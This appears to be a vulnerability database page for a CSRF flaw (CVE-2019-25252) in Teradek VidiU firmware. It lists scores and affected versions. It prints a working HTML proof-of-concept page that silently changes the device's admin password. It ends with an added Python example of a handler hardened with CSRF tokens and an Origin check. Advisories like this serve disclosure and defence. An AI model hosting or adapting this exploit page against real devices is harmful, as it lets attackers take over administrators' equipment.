Security Vulnerability Report
CVE-2019-25252 CVSS 4.3 MEDIUM

CVE-2019-25252

Published: 2025-12-24 20:15:54
Last Modified: 2026-01-26 16:15:54

Description

Teradek VidiU Pro 3.0.3 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft malicious web pages that automatically submit password change requests to the device when a logged-in administrator visits the page.

CVSS Details

CVSS 3.1 Score (Primary)
4.3
Severity
MEDIUM
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVSS 4.0 Score (Secondary)
5.1 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Weakness
CWE-352 (Cross-Site Request Forgery)

Configurations (Affected Products)

cpe:2.3:o:teradek:vidiu_pro_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_pro_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu_pro:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:2.4.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:3.0.2:build31225:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:teradek:vidiu_mini_firmware:3.0.3:build32136:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:vidiu_mini:-:*:*:*:*:*:*:* - NOT VULNERABLE
Teradek VidiU Pro <= 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2019-25252 CSRF Exploit for Teradek VidiU Pro -->
<!-- Target: Teradek VidiU Pro device password change -->
<!-- This PoC demonstrates the CSRF vulnerability -->
<!DOCTYPE html>
<html>
<head>
  <title>Teradek VidiU Pro CSRF PoC</title>
</head>
<body>
  <h2>CVE-2019-25252 - Teradek VidiU Pro CSRF Password Reset</h2>
  <p>This page will automatically submit a password change request to the target device.</p>
  <script>
    // Configuration - Replace with target device IP/hostname
    var targetHost = "192.168.1.100"; // Target VidiU Pro IP
    var newPassword = "HackedPass123!"; // New admin password

    // Create the CSRF form automatically
    var form = document.createElement("form");
    form.method = "POST";
    form.action = "http://" + targetHost + "/admin/password-change";

    // Add password change parameters
    var params = {
      "password": newPassword,
      "confirm_password": newPassword,
      "submit": "Apply"
    };
    for (var key in params) {
      var input = document.createElement("input");
      input.type = "hidden";
      input.name = key;
      input.value = params[key];
      form.appendChild(input);
    }
    document.body.appendChild(form);

    // Auto-submit the form
    form.submit();
  </script>
  <noscript>
    <p>JavaScript is disabled. Please click the button below:</p>
    <button type="submit" formtarget="_blank">Submit Password Change</button>
  </noscript>
</body>
</html>
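For contrast with the PoC above, the following is an added example (not code from the page or from Teradek) of the server-side check the description says is missing: a password-change handler that binds a synchronizer token to the admin session and verifies the browser-supplied Origin/Referer before accepting the `password`/`confirm_password` fields the PoC posts. The handler name, the `csrf_token` field, the session layout and `DEVICE_ORIGIN` are assumptions; the request is modelled as plain dicts.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed device origin (the PoC above targets 192.168.1.100 over plain HTTP).
DEVICE_ORIGIN = "http://192.168.1.100"


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the admin session (synchronizer-token pattern)."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers: dict) -> bool:
    """True only if the browser-set Origin (or Referer) names the device itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # no source header at all: treat as cross-site
    u = urlparse(source)
    return f"{u.scheme}://{u.netloc}" == DEVICE_ORIGIN


def handle_password_change(session: dict, headers: dict, form: dict) -> tuple:
    """Hypothetical hardened /admin/password-change handler. Returns (status, message)."""
    if not session.get("authenticated"):
        return 401, "not logged in"
    if not origin_allowed(headers):
        return 403, "cross-site request rejected"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    if not form.get("password") or form.get("password") != form.get("confirm_password"):
        return 400, "password mismatch"
    issue_csrf_token(session)  # rotate so a leaked token cannot be replayed
    return 200, "password changed"


def demo() -> tuple:
    """Constructed requests: the PoC's cross-site POST, then a legitimate same-origin one."""
    session = {"authenticated": True}
    token = issue_csrf_token(session)
    csrf_headers = {"Origin": "http://attacker-page.example"}
    csrf_form = {"password": "HackedPass123!", "confirm_password": "HackedPass123!", "submit": "Apply"}
    blocked, _ = handle_password_change(session, csrf_headers, csrf_form)
    good_headers = {"Referer": DEVICE_ORIGIN + "/admin/password-change"}
    good_form = {"password": "N3w-Str0ng-Pass", "confirm_password": "N3w-Str0ng-Pass", "csrf_token": token}
    ok, _ = handle_password_change(session, good_headers, good_form)
    return blocked, ok  # (403, 200)
```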

References

Raw JSON Data
